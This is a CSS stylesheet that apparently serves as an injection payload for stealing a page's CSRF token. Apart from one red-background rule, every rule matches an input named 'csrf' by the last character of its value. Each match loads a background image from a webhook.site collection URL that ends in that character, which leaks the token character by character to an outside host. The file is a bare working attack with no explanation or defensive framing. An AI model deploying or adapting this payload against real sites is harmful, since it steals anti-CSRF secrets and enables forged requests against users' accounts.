body {
    background-color: red;
}

input[name=csrf][value$="0"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/0); }
input[name=csrf][value$="1"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/1); }
input[name=csrf][value$="2"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/2); }
input[name=csrf][value$="3"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/3); }
input[name=csrf][value$="4"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/4); }
input[name=csrf][value$="5"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/5); }
input[name=csrf][value$="6"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/6); }
input[name=csrf][value$="7"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/7); }
input[name=csrf][value$="8"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/8); }
input[name=csrf][value$="9"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/9); }
input[name=csrf][value$="a"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/a); }
input[name=csrf][value$="b"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/b); }
input[name=csrf][value$="c"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/c); }
input[name=csrf][value$="d"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/d); }
input[name=csrf][value$="e"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/e); }
input[name=csrf][value$="f"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/f); }
input[name=csrf][value$="g"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/g); }
input[name=csrf][value$="h"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/h); }
input[name=csrf][value$="i"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/i); }
input[name=csrf][value$="j"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/j); }
input[name=csrf][value$="k"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/k); }
input[name=csrf][value$="l"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/l); }
input[name=csrf][value$="m"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/m); }
input[name=csrf][value$="n"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/n); }
input[name=csrf][value$="o"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/o); }
input[name=csrf][value$="p"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/p); }
input[name=csrf][value$="q"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/q); }
input[name=csrf][value$="r"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/r); }
input[name=csrf][value$="s"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/s); }
input[name=csrf][value$="t"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/t); }
input[name=csrf][value$="u"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/u); }
input[name=csrf][value$="v"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/v); }
input[name=csrf][value$="w"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/w); }
input[name=csrf][value$="x"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/x); }
input[name=csrf][value$="y"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/y); }
input[name=csrf][value$="z"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/z); }
input[name=csrf][value$="A"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/A); }
input[name=csrf][value$="B"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/B); }
input[name=csrf][value$="C"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/C); }
input[name=csrf][value$="D"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/D); }
input[name=csrf][value$="E"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/E); }
input[name=csrf][value$="F"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/F); }
input[name=csrf][value$="G"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/G); }
input[name=csrf][value$="H"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/H); }
input[name=csrf][value$="I"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/I); }
input[name=csrf][value$="J"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/J); }
input[name=csrf][value$="K"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/K); }
input[name=csrf][value$="L"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/L); }
input[name=csrf][value$="M"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/M); }
input[name=csrf][value$="N"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/N); }
input[name=csrf][value$="O"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/O); }
input[name=csrf][value$="P"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/P); }
input[name=csrf][value$="Q"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/Q); }
input[name=csrf][value$="R"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/R); }
input[name=csrf][value$="S"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/S); }
input[name=csrf][value$="T"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/T); }
input[name=csrf][value$="U"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/U); }
input[name=csrf][value$="V"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/V); }
input[name=csrf][value$="W"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/W); }
input[name=csrf][value$="X"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/X); }
input[name=csrf][value$="Y"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/Y); }
input[name=csrf][value$="Z"]{ background-image: url(https://webhook.site/af50aa25-f2c2-4562-ac29-aee72c8929d4/Z); }
input[name=csrf][value$="!"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/!); }
input[name=csrf][value$="#"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/#); }
input[name=csrf][value$="$"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/$); }
input[name=csrf][value$="%"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/%); }
input[name=csrf][value$="&"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/&); }
input[name=csrf][value$="*"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/*); }
input[name=csrf][value$="+"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/+); }
input[name=csrf][value$=","]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/,); }
input[name=csrf][value$="-"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/-); }
input[name=csrf][value$="."]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/.); }
input[name=csrf][value$="/"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed//); }
input[name=csrf][value$=":"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/:); }
input[name=csrf][value$=";"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/;); }
input[name=csrf][value$="<"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/<); }
input[name=csrf][value$="="]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/=); }
input[name=csrf][value$=">"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/>); }
input[name=csrf][value$="?"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/?); }
input[name=csrf][value$="@"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/@); }
input[name=csrf][value$="^"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/^); }
input[name=csrf][value$="_"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/_); }
input[name=csrf][value$="`"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/`); }
input[name=csrf][value$="~"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/~); }
input[name=csrf][value$=" "]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/ ); }
input[name=csrf][value$="|"]{ background-image: url(https://webhook.site/4b2b9c93-51f5-44bb-8b66-f58bc8531fed/|); }
